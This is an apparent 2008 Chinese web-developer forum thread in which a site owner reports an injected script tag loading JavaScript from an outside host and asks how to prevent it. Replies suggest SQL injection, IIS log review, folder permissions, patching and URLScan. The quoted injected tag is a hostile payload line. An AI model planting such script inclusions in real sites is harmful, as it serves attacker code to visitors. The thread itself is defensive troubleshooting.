62,041
社区成员
发帖
与我相关
我的任务
分享网页被嵌入 代码,如何解决
网站下部分网页被嵌入 <script language="javascript" src="http://css.qpoe.com/css.js?mo=8&esa=21"></script>
这种代码,好烦人
有谁知道怎么杜绝这种问题的再次发生?
这种代码,好烦人
有谁知道怎么杜绝这种问题的再次发生?
...全文
请发表友善的回复…
发表回复
kaqia2003 2008-07-17
- 打赏
- 举报
5555555,这个问题到底工要怎么解决啊?有没有大侠来帮忙看看。
kaqia2003 2008-07-11
- 打赏
- 举报
另,你在前面所说,情况多半是SQL注入的,一般情况在IIS日志里面可以找到注入点!
如何查看。
如何查看。
kaqia2003 2008-07-11
- 打赏
- 举报
[Quote=引用 11 楼 weinaxxc 的回复:]
引用 9 楼 yoursWTR 的回复:
引用 7 楼 weinaxxc 的回复:
这种情况多半是SQL注入的,一般情况在你的IIS日志里面可以找到注入点!
SQL默认会有改WEB文件内文件的权限?
一般是你的WEB站点文件夹下权限没设置好
一般ASP.NET WEB站点就3个用户权限:
NETWORK SERVICE ASP.NET的用户权限
IUSER 来宾帐户
Administartors 管理权限
如有需要还可以添加FTP管理软件的权限
除此之外记得打好补丁
SQL没…
[/Quote]
在此之前,确实有过sql被注入的情况,我检查了一下,一般是数据库的sql agent服务器停止的时候,数据库被注入了。所以这段时间以来,很注意sql agent服务是否一直在启动,做好备份工作。这段时间数据库的情况还好,但是网页上有所注入。我想网页上的注入是以前就有了,只是现在才发现。
数据库被注入是因为存储过程不严谨的原因,当时因为急于解决问题,网站很多代码是前人所写,所以并没有把所有的代码进行检查。网页是放在服务器上的,被注入代码,这个是IIS权限的问题还是怎么回事?
引用 9 楼 yoursWTR 的回复:
引用 7 楼 weinaxxc 的回复:
这种情况多半是SQL注入的,一般情况在你的IIS日志里面可以找到注入点!
SQL默认会有改WEB文件内文件的权限?
一般是你的WEB站点文件夹下权限没设置好
一般ASP.NET WEB站点就3个用户权限:
NETWORK SERVICE ASP.NET的用户权限
IUSER 来宾帐户
Administartors 管理权限
如有需要还可以添加FTP管理软件的权限
除此之外记得打好补丁
SQL没…
[/Quote]
在此之前,确实有过sql被注入的情况,我检查了一下,一般是数据库的sql agent服务器停止的时候,数据库被注入了。所以这段时间以来,很注意sql agent服务是否一直在启动,做好备份工作。这段时间数据库的情况还好,但是网页上有所注入。我想网页上的注入是以前就有了,只是现在才发现。
数据库被注入是因为存储过程不严谨的原因,当时因为急于解决问题,网站很多代码是前人所写,所以并没有把所有的代码进行检查。网页是放在服务器上的,被注入代码,这个是IIS权限的问题还是怎么回事?
liqiang8 2008-07-11
- 打赏
- 举报
服务器遭受arp攻击了
kaqia2003 2008-07-11
- 打赏
- 举报
555555,怎么今天都没人来回答了?
kaqia2003 2008-07-10
- 打赏
- 举报
[Quote=引用 7 楼 weinaxxc 的回复:]
这种情况多半是SQL注入的,一般情况在你的IIS日志里面可以找到注入点!
[/Quote]
查看当天的IIS日志吗?我看到记录的都是IP
这种情况多半是SQL注入的,一般情况在你的IIS日志里面可以找到注入点!
[/Quote]
查看当天的IIS日志吗?我看到记录的都是IP
weinaxxc 2008-07-10
- 打赏
- 举报
这种情况多半是SQL注入的,一般情况在你的IIS日志里面可以找到注入点!
seesea125 2008-07-10
- 打赏
- 举报
这个扫描软件有什么作用?能杜绝网页被放代码吗?
这软件就是干这活的。。。。
这软件就是干这活的。。。。
kaqia2003 2008-07-10
- 打赏
- 举报
杀过了,把原来的备份还原了,可还是再次发生了.
sheng9hhd 2008-07-10
- 打赏
- 举报
一般表示服务器被攻击!
检查上传程序,或者同一台服务器上别的客户被攻击!
先杀毒吧
检查上传程序,或者同一台服务器上别的客户被攻击!
先杀毒吧
kaqia2003 2008-07-10
- 打赏
- 举报
这个扫描软件有什么作用?能杜绝网页被放代码吗?
bhtfg538 2008-07-10
- 打赏
- 举报
估计 你 有上传后者 注入漏洞
seesea125 2008-07-10
- 打赏
- 举报
用放扫描软件啊,给你推荐微软发布的urlscan
http://www.microsoft.com/china/technet/security/guidance/secmod114.mspx
http://www.microsoft.com/china/technet/security/guidance/secmod114.mspx
weinaxxc 2008-07-10
- 打赏
- 举报
[Quote=引用 9 楼 yoursWTR 的回复:]
引用 7 楼 weinaxxc 的回复:
这种情况多半是SQL注入的,一般情况在你的IIS日志里面可以找到注入点!
SQL默认会有改WEB文件内文件的权限?
一般是你的WEB站点文件夹下权限没设置好
一般ASP.NET WEB站点就3个用户权限:
NETWORK SERVICE ASP.NET的用户权限
IUSER 来宾帐户
Administartors 管理权限
如有需要还可以添加FTP管理软件的权限
除此之外记得打好补丁
[/Quote]
SQL没有改WEB文件内文件的权限,我只是针对LZ的这种情况,很可能是因为数据库里面的数据被更改了,LZ检查一下数据库,看看你的字段后面是不是都被加上了这么一段JS代码?如果有的话,就是被人通过SQL注入到你的数据库了!
引用 7 楼 weinaxxc 的回复:
这种情况多半是SQL注入的,一般情况在你的IIS日志里面可以找到注入点!
SQL默认会有改WEB文件内文件的权限?
一般是你的WEB站点文件夹下权限没设置好
一般ASP.NET WEB站点就3个用户权限:
NETWORK SERVICE ASP.NET的用户权限
IUSER 来宾帐户
Administartors 管理权限
如有需要还可以添加FTP管理软件的权限
除此之外记得打好补丁
[/Quote]
SQL没有改WEB文件内文件的权限,我只是针对LZ的这种情况,很可能是因为数据库里面的数据被更改了,LZ检查一下数据库,看看你的字段后面是不是都被加上了这么一段JS代码?如果有的话,就是被人通过SQL注入到你的数据库了!
yoursWTR 2008-07-10
- 打赏
- 举报
还有 权限范围设置好
yoursWTR 2008-07-10
- 打赏
- 举报
[Quote=引用 7 楼 weinaxxc 的回复:]
这种情况多半是SQL注入的,一般情况在你的IIS日志里面可以找到注入点!
[/Quote]
SQL默认会有改WEB文件内文件的权限?
一般是你的WEB站点文件夹下权限没设置好
一般ASP.NET WEB站点就3个用户权限:
NETWORK SERVICE ASP.NET的用户权限
IUSER 来宾帐户
Administartors 管理权限
如有需要还可以添加FTP管理软件的权限
除此之外记得打好补丁
这种情况多半是SQL注入的,一般情况在你的IIS日志里面可以找到注入点!
[/Quote]
SQL默认会有改WEB文件内文件的权限?
一般是你的WEB站点文件夹下权限没设置好
一般ASP.NET WEB站点就3个用户权限:
NETWORK SERVICE ASP.NET的用户权限
IUSER 来宾帐户
Administartors 管理权限
如有需要还可以添加FTP管理软件的权限
除此之外记得打好补丁
